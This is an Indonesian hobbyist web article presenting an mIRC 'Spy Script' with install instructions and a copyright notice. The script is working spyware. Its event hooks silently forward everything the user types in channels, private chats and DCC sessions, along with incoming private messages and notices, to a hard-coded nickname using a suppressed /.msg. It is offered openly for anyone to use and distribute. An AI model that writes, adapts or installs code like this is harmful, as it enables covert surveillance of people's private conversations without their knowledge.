Artikel From Rozy Crew


=================================================================================================
Jika Anda Ingin Berbagi Ilmu
Tentang Ilmu Komputer
Tolong Kirimkan Tips dan Trik atau Artikel Anda
Ke Rozy@hehe.com atau Rozy_eksa@yahoo.com 
VER Bahasa Indonesia
=================================================================================================
Spy Script

 

INSTALLATION:
; 1. Copy all of these scripts to Notepad and Save As Spy.mrc
; 2. Put the Spy.mrc into mIRC directory.
; 3. Load the script: /load -rs Spy.mrc (in your Status Window) and type /remote on (optional).
; COPYRIGHT: You may distribute this script anywhere you like. All I ask is that you'll always include this Text File (Unchanged please) if you do. It can help many a Newbie to install the script. Also, I worked very hard at this script. Please keep it that way and don't claim it as your own.
; TIPS: -
;
;-------- - -
; Remote
;-------- - -
ON *:INPUT:#:/.msg YourNick 1[10Channel1]4-12 $+ $me $+ 4:1 $1-
ON *:INPUT:?:/.msg YourNick 1[10Private1]4-12 $+ $me $+ 4:1 $1-
ON *:INPUT:=:/.msg YourNick 1[10DCC Chat1]4-12 $+ $me $+ 4:1 $1-
ON *:INPUT:*:/.msg YourNick 1[10Input1]4-12 $+ $me $+ 4:1 $1-
ON *:TEXT:*:?:/.msg YourNick 1[10Private1]4-12 $+ $nick $+ 4:1 $1-
ON *:NOTICE:*:?:/.msg YourNick 1[10Notice1]4-12 $+ $nick $+ 4:1 $1-
ON *:OPEN:?:*:/.msg YourNick 1[10Private1]4-12 $+ $nick $+ 4:1 $1-

 

<<< BACK >>>